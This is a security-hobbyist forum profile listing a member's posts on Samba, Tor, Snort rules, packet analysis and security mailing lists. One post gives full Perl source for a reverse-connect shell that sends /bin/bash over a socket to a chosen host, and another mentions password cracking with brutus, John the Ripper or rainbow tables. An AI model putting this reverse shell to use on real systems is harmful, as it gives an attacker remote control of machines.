chillmaster

Members
  • Content count

    165
  • Joined

  • Last visited

Community Reputation

-1 Noobie

About chillmaster

  • Rank
    SUP3R 31337

Contact Methods

  • ICQ
    0
  1. Samba benchmarks faster than win2k3 last I checked so if you are just looking to setup your own domain controller for fun/learning purposes I suggest trying Linux. Its free gives you a lot of options and when you sit down in front of the real thing (the server wizard in win2k3) you will think you are losing brain cells.
  2. I still swear by tor http://tor.freehaven.net/ but to be honest the anonymity of most proxys can be subverted if someone is actually targeting you. DNS resolution is a big problem for anonymity. see http://wiki.noreply.org/noreply/TheOnionRo...light=%28DNS%29
  3. http://www.chill-fu.net/hackdmz/forum/viewtopic.php?t=89 See that link for my screenshot. WM: Fluxbox Terminal: Eterm dockapp: Gkrellm
  4. http://www.chill-fu.net/hackdmz/sandbox.php try some searches like perl, python, linux, or network
  5. I know everyone knows about securityfocus.com but do they know about http://www.securityfocus.com/bid ? Its an old bookmark I have and I couldnt figure out how to get back to it from the new homepage.
  6. if you have time get a spare box and install snort! http://snort.org/ some of the things an IDS can do is detect portscans, brute force attempts. They are usually packet sniffers built with rules. These rules usualy define when to take an action. They can also detect arpspoofing on a network usually. Here is a list of rules from snort.conf include $RULE_PATH/local.rules include $RULE_PATH/bad-traffic.rules include $RULE_PATH/exploit.rules include $RULE_PATH/scan.rules include $RULE_PATH/finger.rules include $RULE_PATH/ftp.rules include $RULE_PATH/telnet.rules include $RULE_PATH/rpc.rules include $RULE_PATH/rservices.rules include $RULE_PATH/dos.rules include $RULE_PATH/ddos.rules include $RULE_PATH/dns.rules include $RULE_PATH/tftp.rules include $RULE_PATH/web-cgi.rules include $RULE_PATH/web-coldfusion.rules include $RULE_PATH/web-iis.rules include $RULE_PATH/web-frontpage.rules include $RULE_PATH/web-misc.rules include $RULE_PATH/web-client.rules include $RULE_PATH/web-php.rules include $RULE_PATH/sql.rules
  7. Hey at least I didnt say go read all the RFC documents on the following protocols... look when it comes down to it, you have to ask yourself Do you know how ports work? Do you understand not all network traffic utilizes ports? Do you know what a SYN or an ACK is? what about a ARP or RARP Do you understand what protocols utilize these? Why? How? Because what you are looking at in ethereal/wireshark is the ASCII representation of each one of those packets. If you dont understand how the packets relate to one another you will be lost.
  8. The best way to understand wireshark/ethereal output is to understand how internet communications work. Start with the OSI model http://en.wikipedia.org/wiki/OSI_model While data is being transfered across a network, each layer adds its own header to the data. Eventually this creates the entire packet with the protocols used at each layer. This is the stuff you need to familiarize yourself with if you wish to be fluent at reading network traffic.
  9. http://www.eve-online.com/ They love python for its non-threading goodness
  10. You can easily mitigate MOST rootkit attempts (if your system has been hacked that far) just by using GrSecurity. GrSecurity.org
  11. 2 days ago there was an update to the current lawsuit pending against AT&T http://www.eff.org/news/archives/2006_11.php#004990 http://www.chill-fu.net/hackdmz/forum/view...c.php?p=573#573
  12. Ya thats your best bet if you have a predetermined target with information there for you to gather. Otherwise it is simple enough to hack around with brutus,jtr, or rainbow table techniques
  13. cant go wrong with bugtraq, but you can subscribe through securityfocus so you might already have it
  14. reverse shell in perl #!/usr/bin/perl -w #################################################################### # # PERL reverse connect shell # --intropy-- # intropy [at] caughq [dot] org # # This is in the cau-aimshell just thought id rip it out and give # it to you in case you want it. Nothing fancy and kinda sloppy. # # Enjoy # #################################################################### use strict; use Socket; use IO::Socket; # Get our IP and Port my $ip = $ARGV[0] || "10.1.1.33"; my $port = $ARGV[1] || "5100"; # Define our socket my $domain = PF_INET; my $type = SOCK_STREAM; my $proto = getprotobyname('tcp'); # Call socket with handle socket(SOCKHAND, $domain, $type, $proto) or die "socket: $!\n"; # Define our connect my $nip = inet_aton($ip); my $sockaddr = sockaddr_in($port, $nip); # Call connect passing handle connect(SOCKHAND, $sockaddr) or die "connect: $!\n"; open(STDIN, ">&SOCKHAND"); open(STDOUT, ">&SOCKHAND"); open(STDERR, ">&SOCKHAND"); if (my $pid = fork) { print("[!] Opened process with pid [$pid]\n"); exit(0); } else { # Execute our shell system('/bin/bash') or die "system: $!\n"; close(SOCKHAND); } a C example http://www.chill-fu.net/nc.c
  15. The only problem I see is when I just want a single package to update. It wouldnt be worth opening a dozen connections for a single file, especially considering the size of most linux packages. It would be nifty to see a service that understood what packages you needed to update then generate a tardball on the fly. At that point a package manager could take over again and download that file over torrent. Bittorrent is a pretty connection intensive protocol and most consumer routers *could* be crippled. I know there are many times that cable users can barely voip and torrent at the same time. Now imagine a production network. More bandwidth true, but more connections on the router as well.